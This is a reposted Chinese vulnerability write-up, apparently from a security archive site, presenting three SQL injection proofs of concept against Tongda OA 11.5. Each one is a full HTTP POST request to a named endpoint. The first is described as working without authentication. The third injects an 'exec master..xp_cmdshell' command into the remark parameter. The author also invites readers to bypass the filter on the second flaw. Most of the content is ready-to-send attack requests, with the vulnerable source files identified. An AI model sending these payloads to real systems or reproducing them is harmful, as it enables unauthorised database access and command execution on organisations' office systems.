menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-通达OA chevron_right 019-通达OA 多枚 0day漏洞 V2 附POC.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    019-通达OA 多枚 0day漏洞 V2 附POC.md
    4.04 KB / 2021-07-17 00:01:26
        # 通达OA 多枚 0day漏洞 V2 附POC
    
    这是继:"【全网首发】通达OA 多枚 0day漏洞分享 附POC"   对通达OA 系统更加深入的一次审计,重新审计后又发现一些问题。
    
    ### 0x001 SQL注入 POC(11.5版本无需登录): 
    
    漏洞参数:SORT_ID,FILE_SORT
    
    审计版本:通达OA 11.5
    
    
    ```bash
    POST /general/file_folder/swfupload_new.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/
    Connection: close
    Host: 192.168.202.1
    Content-Length: 391
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
    
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="ATTACHMENT_ID"
    
    1
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="ATTACHMENT_NAME"
    
    1
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="FILE_SORT"
    
    2
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="SORT_ID"
    
    ------------GFioQpMK0vv2--
    ```
    
    看看下图,在我去掉cookie之后,发现一样能注入,我测试的11.5版本存在未授权也能注入。
    
    ![](media/202008/15982327800781.jpg)
    
    
    漏洞文件:webroot\general\file_folder\swfupload_new.php 。
    
    先看SORT_ID与FILE_SORT参数,这两个参数都 是通过$data[""]; 来接收变量,都直接带入SQL查询语句中,没有做任何过滤,造成注入。
    
    ![](media/202008/15982327906892.jpg)
    
    
    ![](media/202008/15982327951049.jpg)
    
    
    ### 0x002 SQL注入 POC(有过滤): 
    
    漏洞参数:CONTENT_ID_STR
    
    审计版本:通达OA 11.5
    
    
    ```bash
    POST /general/file_folder/api.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&SORT_ID=59
    X-Resource-Type: xhr
    Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
    Connection: close
    Host: 192.168.202.1
    Pragma: no-cache
    x-requested-with: XMLHttpRequest
    Content-Length: 82
    x-wvs-id: Acunetix-Deepscan/209
    Cache-Control: no-cache
    accept: */*
    origin: http://192.168.202.1
    Accept-Language: en-US
    content-type: application/x-www-form-urlencoded; charset=UTF-8
    
    CONTENT_ID_STR=222&SORT_ID=59&FILE_SORT=1&action=sign
    ```
    
    ![](media/202008/15982328222417.jpg)
    
    
    漏洞文件:webroot\general\file_folder\folder.php。
    
    但是经过了td_trim函数,会过滤掉:空格、制表符、换行符、回车符、垂直制表符等。只能报错,或尝试 and 等语句判断还是没有问题的。
    
    ![](media/202008/15982328339363.jpg)
    
    ![](media/202008/15982328376231.jpg)
    
    
    如果有厉害的师傅会有戏,可以绕绕试试了,先放这里了。
    
    
    ![](media/202008/15982328458875.jpg)
    
    
    ### 0x003 SQL注入 POC: 
    
    漏洞参数:remark
    
    审计版本:通达OA 11.5
    
    
    ```bash
    POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true
    X-Resource-Type: xhr
    Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
    Connection: close
    Host: 192.168.202.1
    Pragma: no-cache
    x-requested-with: XMLHttpRequest
    Content-Length: 97
    x-wvs-id: Acunetix-Deepscan/186
    Cache-Control: no-cache
    accept: */*
    origin: http://192.168.202.1
    Accept-Language: en-US
    content-type: application/x-www-form-urlencoded; charset=UTF-8
    
    m_id=5&join_flag=2&remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--
    ```
    
    ![](media/202008/15982328654012.jpg)
    
    
    漏洞文件:webroot\general\appbuilder\modules\meeting\models\MeetingReceipt.php。
    
    漏洞存在于`$remark = $data['remark']; 与$form->REMARK = $remark; ` 可以看到remark参数没有过滤,直接拼接到insert语句中造成的注入。
    
    via:tangshoupu@t00ls
    
    links
    file_download